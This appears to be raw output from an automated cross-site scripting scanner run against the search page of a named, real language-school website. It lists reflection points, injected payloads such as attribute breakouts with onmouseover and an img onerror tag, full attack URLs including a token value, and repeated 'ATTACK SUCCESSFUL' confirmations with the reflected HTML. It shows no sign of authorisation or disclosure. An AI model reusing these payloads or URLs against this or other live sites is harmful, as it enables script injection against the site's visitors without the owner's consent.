https://ifu-institut.at/

GET Params:[2]
['text', 'cms_token']
_______________________________________________________________________________________________________
https://ifu-institut.at/search?text=(uvw"xyz'yxz</zxy&cms_token=8271ec9ba692ce3be55f50818f942d50

----------------------------------------------------------------------------------
Attribute Context: [2]
<img itemprop=logo class=b-logo__img src="uploads/images/xlogo-5-66p.jpg.pagespeed.ic.Mli3Wui12V.jpg" alt="Search - (uvw" xyz'yxz< zxy - IFU Sprachschule" data-pagespeed-url-hash=2967112521 onload="pagespeed.CriticalImages.checkImageForCriticality(this);"/>
<input class=g-form-s__input type=text name=text value="(uvw" xyz'yxz< zxy" placeholder=Suche required>

----------------------------------------------------------------------------------
HTML Context: [2]
<title>Search - (uvw"xyz'yxz</zxy - IFU Sprachschule</title>
<q>(uvw"xyz'yxz</zxy</q>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	False	False	False	False

Attack Payloads for ATTR
['" onmouseover="alert(1)', "' onmouseover='alert(1)"]

ATTR Attack Url: https://ifu-institut.at/search?text=" onmouseover="alert(1)&cms_token=8271ec9ba692ce3be55f50818f942d50

=> ATTACK SUCCESSFUL with Payload: " onmouseover="alert(1)
Detection of Payload: 
<img itemprop=logo class=b-logo__img src="uploads/images/xlogo-5-66p.jpg.pagespeed.ic.Mli3Wui12V.jpg" alt="Search - " onmouseover="alert(1) - IFU Sprachschule" data-pagespeed-url-hash=2967112521 onload="pagespeed.CriticalImages.checkImageForCriticality(this);"/>
<input class=g-form-s__input type=text name=text value="" onmouseover="alert(1)" placeholder=Suche required>

ATTR Attack Url: https://ifu-institut.at/search?text=' onmouseover='alert(1)&cms_token=8271ec9ba692ce3be55f50818f942d50

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<img itemprop=logo class=b-logo__img src="uploads/images/xlogo-5-66p.jpg.pagespeed.ic.Mli3Wui12V.jpg" alt="Search - ' onmouseover='alert(1) - IFU Sprachschule" data-pagespeed-url-hash=2967112521 onload="pagespeed.CriticalImages.checkImageForCriticality(this);"/>
<input class=g-form-s__input type=text name=text value="' onmouseover='alert(1)" placeholder=Suche required>
ENCODING     Presence	"	'	<	( 
ATTR:		True	False	False	False	False

Attack Payloads for ATTR
['" onmouseover="alert(1)', "' onmouseover='alert(1)"]

ATTR Attack Url: https://ifu-institut.at/search?text=" onmouseover="alert(1)&cms_token=8271ec9ba692ce3be55f50818f942d50

=> ATTACK SUCCESSFUL with Payload: " onmouseover="alert(1)
Detection of Payload: 
<img itemprop=logo class=b-logo__img src="uploads/images/xlogo-5-66p.jpg.pagespeed.ic.Mli3Wui12V.jpg" alt="Search - " onmouseover="alert(1) - IFU Sprachschule"/>
<input class=g-form-s__input type=text name=text value="" onmouseover="alert(1)" placeholder=Suche required>

ATTR Attack Url: https://ifu-institut.at/search?text=' onmouseover='alert(1)&cms_token=8271ec9ba692ce3be55f50818f942d50

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<img itemprop=logo class=b-logo__img src="uploads/images/xlogo-5-66p.jpg.pagespeed.ic.Mli3Wui12V.jpg" alt="Search - ' onmouseover='alert(1) - IFU Sprachschule"/>
<input class=g-form-s__input type=text name=text value="' onmouseover='alert(1)" placeholder=Suche required>
ENCODING     Presence	"	'	<	( 
HTML:		True	False	False	False	False

Attack Payloads for HTML
['<img src=x onerror="alert(1)">']

HTML Attack Url: https://ifu-institut.at/search?text=<img src=x onerror="alert(1)">&cms_token=8271ec9ba692ce3be55f50818f942d50

=> ATTACK SUCCESSFUL with Payload: <img src=x onerror="alert(1)">
Detection of Payload: 
<title>Search - <img src=x onerror="alert(1)"> - IFU Sprachschule</title>
ENCODING     Presence	"	'	<	( 
HTML:		True	False	False	False	False

Attack Payloads for HTML
['<img src=x onerror="alert(1)">']

HTML Attack Url: https://ifu-institut.at/search?text=<img src=x onerror="alert(1)">&cms_token=8271ec9ba692ce3be55f50818f942d50

=> ATTACK SUCCESSFUL with Payload: <img src=x onerror="alert(1)">
Detection of Payload: 
<title>Search - <img src=x onerror="alert(1)"> - IFU Sprachschule</title>
<q><img src=x onerror="alert(1)"></q>
_______________________________________________________________________________________________________
https://ifu-institut.at/search?text=&cms_token=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [0]

----------------------------------------------------------------------------------
HTML Context: [0]

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [0]

----------------------------------------------------------------------------------


